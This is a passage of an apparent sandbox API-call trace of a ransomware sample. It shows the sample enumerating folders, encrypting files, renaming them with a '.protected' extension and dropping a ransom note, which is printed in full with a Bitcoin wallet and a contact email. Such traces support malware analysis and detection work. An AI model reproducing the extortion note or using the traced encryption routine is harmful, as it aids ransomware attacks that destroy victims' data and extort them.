lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.646] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.646] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.646] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.646] CloseHandle (hObject=0x164) returned 1 [0080.646] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0080.646] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR") returned 144 [0080.646] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0080.647] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\*") returned 146 [0080.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.647] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.647] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.647] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.647] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.647] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\.") returned 146 [0080.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.647] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.647] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.647] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.647] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.647] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.647] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\..") returned 147 [0080.647] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.647] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.647] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.647] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.647] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.647] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.648] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.648] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.648] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.648] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.649] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.649] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.649] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.649] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.649] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.649] CloseHandle (hObject=0x168) returned 1 [0080.649] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0080.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0080.650] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.650] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.650] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0080.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.650] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.650] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.651] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.651] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.651] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.651] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.651] CloseHandle (hObject=0x164) returned 1 [0080.651] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0080.651] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT") returned 144 [0080.651] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0080.651] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0080.651] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\*") returned 146 [0080.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.652] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.652] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.652] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.652] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.652] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\.") returned 146 [0080.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.652] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.652] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.652] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.652] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.652] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\..") returned 147 [0080.652] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.652] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.652] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.653] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.653] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.653] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.653] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.653] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.653] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.653] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.654] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.654] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.654] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.654] CloseHandle (hObject=0x168) returned 1 [0080.654] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0080.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0080.655] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.655] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.655] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0080.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.655] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.655] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.656] lstrlenA 